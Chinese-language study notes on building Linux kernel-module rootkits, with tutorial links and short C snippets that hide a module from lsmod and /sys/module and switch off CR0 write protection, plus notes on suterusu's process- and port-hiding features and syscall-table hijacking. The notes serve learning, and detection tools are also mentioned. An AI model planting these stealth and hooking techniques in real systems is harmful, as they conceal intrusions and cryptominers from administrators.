教学篇

系列一

Linux Rootkit:LKM的基础编写及隐藏

Linux Rootkit 系列后续

Linux Rootkit 第四篇

系列二

Linux Rootkits Part 1: Introduction and Workflow

杂项

hiding-cryptominers-linux

视频

Linux LKM Rootkit Tutorial | Linux Kernel Module Rootkit | Part 1

Linux LKM Rootkit Tutorial | Linux Kernel Module Rootkit | Part 2

Linux LKM Rootkit Tutorial | Protect Yourself From MALICIOUS LKM with rkhunter & chkrootkit | Part 3

项目

rootkits

hids

知识

  • 头文件
  1. #include <linux/kernel.h>
  2. #include <linux/init.h>
  3. #include <linux/module.h>
  • 注册和卸载

module_init(func)

module_exit(func)

  • 基本框架
  1. static int __init init() {
  3. }
  5. static void __exit exit() {
  7. }
  9. MODULE_AUTHOR();
  10. MODULE_LICENSE();
  11. MODULE_DESCRIPTION();
  12. MODULE_VERSION();
  14. module_init(init);
  15. module_exit(exit);

https://blog.csdn.net/whatday/article/details/96986296

https://xcellerator.github.io/posts/linux_rootkits_02/

lsmod中隐藏

  1. #include <linux/list.h>
  3. static inline list_del_init(struct list_head *entry);
  5. // 在__init中调用
  6. list_del_init(&__this_module.list);

sys/module中隐藏

  1. #include <linux/module.h>
  4. module结构体
  5.     ->module_kobject结构体
  6.         -> kobject结构体
  7.         -> module结构体
  8.         -> ...
  10. struct module_kobject {
  11.     struct kobject kobj;
  12.     struct module *mod;
  13. };
  15. // module.h中
  16. extern struct module __this_module;
  17. #define THIS_MODULE (&__this_module)
  19. // kobject.h中
  20. extern void kobject_del(struct kobject *kobj);
  22. // __init中调用
  23. kobject_del(&THIS_MODULE->mkobj.kobj)

disable_protection

  1. void 
  2. disable_protection(void) {
  3.     unsigned long cr0 = read_cr0();
  4.     clear_bit(16, &cr0);
  5.     write_cr0(cr0);
  6. }
  1. void 
  2. enable_protection(void) {
  3.     unsigned long cr0 = read_cr0();
  4.     set_bit(16, &cr0);
  5.     write_cr0(cr0);
  6. }

struct kobject是组成设备模型的结构体

ftrace refs:
https://blog.csdn.net/sganchang/article/details/91374486
https://blog.csdn.net/dog250/article/details/84667690
https://blog.csdn.net/pwl999/article/details/107426138
https://xz.aliyun.com/t/2948
https://www.apriorit.com/dev-blog/546-hooking-linux-functions-2
https://hackmd.io/@hankluo6/hideproc
https://hackmd.io/@hankluo6

suterusu
能用的

  • 自身隐藏
  • 进程隐藏
  • 端口隐藏

不好使的

  • 文件隐藏

未实现的

  • 目录隐藏

https://poppopret.org/2013/01/07/suterusu-rootkit-inline-kernel-function-hooking-on-x86-and-arm/#comments

https://www.j0s1ph.com/?p=5940

通用结构体&API

侵入式链表 struct list_head
struct seq_file
struct dir_context
list_for_each_entry
list_add
list_del

set_bit (long nr, volatile unsigned long addr);
clear_bit (long nr, volatile unsigned long addr);

dev_get_flags

proc_filldir
root_filldir

proc_iterate
root_iterate

simple_strtol

copy_from_user
cap_set_full
commit_creds

kfree
kmalloc

DEFINE_SPINLOCK(spinlock);
spin_lock_irqsave
spin_unlock_irqrestore

为什么要转为16进制?

hijack_start 注册hook

hijack_pause hook动作,后面会跟自己的动作
hijack_resume 放回原来的动作
hijack_stop 卸载hook

disable_wp
restore_wp

kallsyms_on_each_symbol

arm_write_hook

task_struct
https://www.jianshu.com/p/691d02380312

mm_segment
https://docs.huihoo.com/doxygen/linux/kernel/3.7/structmmsegmentt.html

rootkit
https://docs-conquer-the-universe.readthedocs.io/zh_CN/latest/linux_rootkit/sys_call_table.html

source codes
https://github.com/peaceSh4wn/research-rootkit/tree/master/1-sys_call_table

how to find syscall_table(入门很平滑,舒适)
https://infosecwriteups.com/linux-kernel-module-rootkit-syscall-table-hijacking-8f1bc0bd099c

  • 这篇文章里的set_fs和get_fs编译出错,有可能是笔误

需要保持专注啊